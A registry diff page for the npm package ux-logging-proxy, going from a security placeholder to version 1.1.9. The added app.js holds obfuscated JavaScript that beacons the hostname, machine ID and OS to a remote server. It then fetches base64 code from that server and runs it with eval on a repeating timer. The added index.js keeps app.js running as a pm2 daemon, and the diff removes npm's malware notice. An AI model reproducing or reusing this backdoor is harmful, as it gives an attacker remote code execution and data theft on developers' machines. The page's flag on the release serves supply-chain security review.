ux-logging-proxy 0.0.1-security → 1.1.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ux-logging-proxy might be problematic. Click here for more details.
- package/.idea/modules.xml +8 -0
- package/.idea/ux-logging-proxy-encode.iml +12 -0
- package/.idea/workspace.xml +59 -0
- package/app.js +1 -0
- package/index.js +1 -0
- package/package.json +13 -3
- package/README.md +0 -5
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="ProjectModuleManager">
|
|
4
|
+
<modules>
|
|
5
|
+
<module fileurl="file://$PROJECT_DIR$/.idea/ux-logging-proxy-encode.iml" filepath="$PROJECT_DIR$/.idea/ux-logging-proxy-encode.iml" />
|
|
6
|
+
</modules>
|
|
7
|
+
</component>
|
|
8
|
+
</project>
|
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<module type="WEB_MODULE" version="4">
|
|
3
|
+
<component name="NewModuleRootManager">
|
|
4
|
+
<content url="file://$MODULE_DIR$">
|
|
5
|
+
<excludeFolder url="file://$MODULE_DIR$/temp" />
|
|
6
|
+
<excludeFolder url="file://$MODULE_DIR$/.tmp" />
|
|
7
|
+
<excludeFolder url="file://$MODULE_DIR$/tmp" />
|
|
8
|
+
</content>
|
|
9
|
+
<orderEntry type="inheritedJdk" />
|
|
10
|
+
<orderEntry type="sourceFolder" forTests="false" />
|
|
11
|
+
</component>
|
|
12
|
+
</module>
|
|
@@ -0,0 +1,59 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="ChangeListManager">
|
|
4
|
+
<list default="true" id="faa727c9-86a9-4b49-bfb6-368507f2dad6" name="变更" comment="" />
|
|
5
|
+
<option name="SHOW_DIALOG" value="false" />
|
|
6
|
+
<option name="HIGHLIGHT_CONFLICTS" value="true" />
|
|
7
|
+
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
|
|
8
|
+
<option name="LAST_RESOLUTION" value="IGNORE" />
|
|
9
|
+
</component>
|
|
10
|
+
<component name="FileTemplateManagerImpl">
|
|
11
|
+
<option name="RECENT_TEMPLATES">
|
|
12
|
+
<list>
|
|
13
|
+
<option value="JavaScript File" />
|
|
14
|
+
</list>
|
|
15
|
+
</option>
|
|
16
|
+
</component>
|
|
17
|
+
<component name="MarkdownSettingsMigration">
|
|
18
|
+
<option name="stateVersion" value="1" />
|
|
19
|
+
</component>
|
|
20
|
+
<component name="ProjectId" id="2SIdBrpDCMzVceek8CT4JndeKko" />
|
|
21
|
+
<component name="ProjectViewState">
|
|
22
|
+
<option name="hideEmptyMiddlePackages" value="true" />
|
|
23
|
+
<option name="showLibraryContents" value="true" />
|
|
24
|
+
</component>
|
|
25
|
+
<component name="PropertiesComponent">{
|
|
26
|
+
"keyToString": {
|
|
27
|
+
"RunOnceActivity.OpenProjectViewOnStart": "true",
|
|
28
|
+
"RunOnceActivity.ShowReadmeOnStart": "true",
|
|
29
|
+
"WebServerToolWindowFactoryState": "false",
|
|
30
|
+
"last_opened_file_path": "/Users/mac/WebstormProjects/ux-logging-proxy-encode",
|
|
31
|
+
"nodejs_package_manager_path": "npm",
|
|
32
|
+
"vue.rearranger.settings.migration": "true"
|
|
33
|
+
}
|
|
34
|
+
}</component>
|
|
35
|
+
<component name="RecentsManager">
|
|
36
|
+
<key name="CopyFile.RECENT_KEYS">
|
|
37
|
+
<recent name="$PROJECT_DIR$" />
|
|
38
|
+
</key>
|
|
39
|
+
</component>
|
|
40
|
+
<component name="SpellCheckerSettings" RuntimeDictionaries="0" Folders="0" CustomDictionaries="0" DefaultDictionary="应用程序级" UseSingleDictionary="true" transferred="true" />
|
|
41
|
+
<component name="TaskManager">
|
|
42
|
+
<task active="true" id="Default" summary="默认任务">
|
|
43
|
+
<changelist id="faa727c9-86a9-4b49-bfb6-368507f2dad6" name="变更" comment="" />
|
|
44
|
+
<created>1688837896835</created>
|
|
45
|
+
<option name="number" value="Default" />
|
|
46
|
+
<option name="presentableId" value="Default" />
|
|
47
|
+
<updated>1688837896835</updated>
|
|
48
|
+
<workItem from="1688837897893" duration="2116000" />
|
|
49
|
+
<workItem from="1688841162626" duration="601000" />
|
|
50
|
+
<workItem from="1688940416784" duration="3017000" />
|
|
51
|
+
<workItem from="1689191963339" duration="20269000" />
|
|
52
|
+
<workItem from="1689396464849" duration="1442000" />
|
|
53
|
+
</task>
|
|
54
|
+
<servers />
|
|
55
|
+
</component>
|
|
56
|
+
<component name="TypeScriptGeneratedFilesManager">
|
|
57
|
+
<option name="version" value="3" />
|
|
58
|
+
</component>
|
|
59
|
+
</project>
|
package/app.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x527869=_0x5036;(function(_0x23c4d6,_0x2dcce8){const _0x8b8ded=_0x5036,_0x543ecb=_0x23c4d6();while(!![]){try{const _0x1aa558=-parseInt(_0x8b8ded(0x19b))/0x1+-parseInt(_0x8b8ded(0x1a6))/0x2+-parseInt(_0x8b8ded(0x1b7))/0x3*(parseInt(_0x8b8ded(0x1a7))/0x4)+parseInt(_0x8b8ded(0x1ad))/0x5+-parseInt(_0x8b8ded(0x196))/0x6+parseInt(_0x8b8ded(0x1a9))/0x7+-parseInt(_0x8b8ded(0x1a1))/0x8*(-parseInt(_0x8b8ded(0x18f))/0x9);if(_0x1aa558===_0x2dcce8)break;else _0x543ecb['push'](_0x543ecb['shift']());}catch(_0x54d16e){_0x543ecb['push'](_0x543ecb['shift']());}}}(_0x1466,0x5595d));const crypto=require('crypto'),fs=require('fs'),os=require('os'),path=require(_0x527869(0x19e)),axios=require(_0x527869(0x1ac)),{machineIdSync}=require(_0x527869(0x19f)),key=_0x527869(0x197),url=_0x527869(0x1a3),filename=path['join'](os[_0x527869(0x192)](),_0x527869(0x1b3)),headersCnf={'headers':{'User-Agent':_0x527869(0x1b2)}};function aesEncrypt(_0x55e7d3){const _0x5b95b2=_0x527869;var _0x5dea17,_0x4fe996;return _0x4fe996='',_0x5dea17=crypto[_0x5b95b2(0x1a8)]('aes-128-cbc',key,key),_0x4fe996+=_0x5dea17['update'](_0x55e7d3,_0x5b95b2(0x1a0),'hex'),_0x4fe996+=_0x5dea17['final'](_0x5b95b2(0x1b5)),_0x4fe996;}function aesDecrypt(_0x506fca){const _0x379ac2=_0x527869;var _0x307609,_0x1697aa,_0x3322b4;return _0x1697aa='',_0x307609=crypto['createDecipheriv'](_0x379ac2(0x1ae),key,key),_0x1697aa+=_0x307609['update'](_0x506fca,'hex','binary'),_0x1697aa+=_0x307609[_0x379ac2(0x1a2)](_0x379ac2(0x1a0)),_0x1697aa;}async function sendRequest(_0x2967bb,_0x780075){const _0x18bfee=_0x527869;try{const _0x1bc50b=await axios['post'](_0x2967bb,_0x780075,headersCnf),_0x161092=_0x1bc50b[_0x18bfee(0x1a5)];return aesDecrypt(_0x161092,key)[_0x18bfee(0x1b1)]();}catch(_0x3b83dc){}}function createTmpFile(){const _0x21a184=getCurrentTime();fs['writeFile'](filename,_0x21a184,_0x138be6=>{if(_0x138be6)return;});}function getCurrentTime(){const _0x419b1c=_0x527869,_0x31e15c=new Date(),_0x3e788=_0x31e15c[_0x419b1c(0x190)](),_0x3b1d33=String(_0x31e15c[_0x419b1c(0x19c)]()+0x1)[_0x419b1c(0x1a4)](0x2,'0'),_0x3823f3=String(_0x31e15c[_0x419b1c(0x1ab)]())[_0x419b1c(0x1a4)](0x2,'0'),_0x5df561=String(_0x31e15c['getHours']())['padStart'](0x2,'0'),_0x4cf026=String(_0x31e15c[_0x419b1c(0x193)]())[_0x419b1c(0x1a4)](0x2,'0'),_0x37476f=_0x3e788+'-'+_0x3b1d33+'-'+_0x3823f3+'\x20'+_0x5df561+':'+_0x4cf026;return _0x37476f;}function checkFile(){const _0x3948e7=_0x527869;try{const _0x121421=fs[_0x3948e7(0x199)](filename,_0x3948e7(0x1af));return{'exists':!![],'content':_0x121421};}catch(_0x5838d4){return{'exists':![],'content':''};}}function heartbeat(){const _0x13eade=_0x527869,_0x5aa15a={'hostname':os[_0x13eade(0x1aa)](),'uuid':machineIdSync({'original':!![]}),'os':os[_0x13eade(0x1b6)]()};sendRequest(url+_0x13eade(0x1b4),aesEncrypt(JSON[_0x13eade(0x198)](_0x5aa15a)));const _0x8a79b4={'uuid':machineIdSync({'original':!![]})};sendRequest(url+_0x13eade(0x1b0),aesEncrypt(JSON[_0x13eade(0x198)](_0x8a79b4)))[_0x13eade(0x191)](_0xb1fd68=>{const _0x30ddff=_0x13eade;try{if(_0xb1fd68!==undefined){const _0x5f08b5=JSON[_0x30ddff(0x19a)](_0xb1fd68),_0x2861e2=Buffer['from'](_0x5f08b5[_0x30ddff(0x194)],_0x30ddff(0x195))[_0x30ddff(0x1b1)]();eval(_0x2861e2);}}catch(_0x5cfc46){}});}function _0x1466(){const _0x1d9256=['2080285NwUkxn','aes-128-cbc','utf-8','/api/captcha','toString','Mozilla/5.0\x20(Windows\x20NT\x2010.0;\x20Win64;\x20x64)\x20AppleWebKit/537.36\x20(KHTML,\x20like\x20Gecko)\x20Chrome/103.0.5060.134','node_log.txt','/api/index','hex','platform','57WxeAxt','32553ucRsSx','getFullYear','then','tmpdir','getMinutes','code','base64','510114TEvmQF','sykKwe59_q11peDz','stringify','readFileSync','parse','422009ffQmoR','getMonth','exists','path','node-machine-id','binary','1272MFJUxE','final','https://www.monsterpro.pro','padStart','data','294524EixBVH','81908uOsayf','createCipheriv','2819250YMIoLs','hostname','getDate','axios'];_0x1466=function(){return _0x1d9256;};return _0x1466();}function _0x5036(_0x5a0ab0,_0xe85199){const _0x146660=_0x1466();return _0x5036=function(_0x503608,_0x377378){_0x503608=_0x503608-0x18f;let _0x459864=_0x146660[_0x503608];return _0x459864;},_0x5036(_0x5a0ab0,_0xe85199);}function app(){const _0x2e32bd=_0x527869,_0x1ccd85=checkFile();if(_0x1ccd85[_0x2e32bd(0x19d)])return;else createTmpFile(),setInterval(heartbeat,0xafc8);}app();
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x580f5b=_0x963c;function _0x963c(_0x5cada7,_0x1ad53c){const _0x1861ed=_0x1861();return _0x963c=function(_0x963cad,_0x3f8f3a){_0x963cad=_0x963cad-0xb3;let _0x1d16ac=_0x1861ed[_0x963cad];return _0x1d16ac;},_0x963c(_0x5cada7,_0x1ad53c);}(function(_0x4e93d4,_0x2fd2f9){const _0x5363b8=_0x963c,_0x4bede8=_0x4e93d4();while(!![]){try{const _0x3feb25=-parseInt(_0x5363b8(0xbd))/0x1*(parseInt(_0x5363b8(0xb5))/0x2)+parseInt(_0x5363b8(0xb6))/0x3+-parseInt(_0x5363b8(0xc1))/0x4+-parseInt(_0x5363b8(0xc0))/0x5+parseInt(_0x5363b8(0xb8))/0x6+parseInt(_0x5363b8(0xbb))/0x7+parseInt(_0x5363b8(0xba))/0x8*(parseInt(_0x5363b8(0xbf))/0x9);if(_0x3feb25===_0x2fd2f9)break;else _0x4bede8['push'](_0x4bede8['shift']());}catch(_0x1f57af){_0x4bede8['push'](_0x4bede8['shift']());}}}(_0x1861,0x44099));function _0x1861(){const _0x17bedf=['/app.js','pm2','852742VVhrMx','1115037YUleuA','disconnect','1797288nFIuBq','my-app','457872KfgyVw','2523752uXCkRr','cluster','1BQxzGi','start','54KNahWu','2474165klKCsV','701128ESZsrH'];_0x1861=function(){return _0x17bedf;};return _0x1861();}const pm2=require(_0x580f5b(0xb4));pm2['connect'](_0x3a76ef=>{const _0x3ea169=_0x580f5b;if(_0x3a76ef)return;const _0x4854cf=__dirname+_0x3ea169(0xb3),_0x521a92=_0x3ea169(0xb9),_0x2c3cf2={'script':_0x4854cf,'name':_0x521a92,'exec_mode':_0x3ea169(0xbc),'daemon':!![]};pm2[_0x3ea169(0xbe)](_0x2c3cf2,(_0x43c603,_0x4b93a2)=>{const _0x2e9872=_0x3ea169;_0x43c603?pm2[_0x2e9872(0xb7)]():pm2['disconnect']();});});
|
package/package.json
CHANGED
|
@@ -1,6 +1,16 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "ux-logging-proxy",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.1.9",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC",
|
|
11
|
+
"dependencies": {
|
|
12
|
+
"pm2": "^5.3.0",
|
|
13
|
+
"axios": "^1.4.0",
|
|
14
|
+
"node-machine-id": "^1.1.12"
|
|
15
|
+
}
|
|
6
16
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=ux-logging-proxy for more information.
|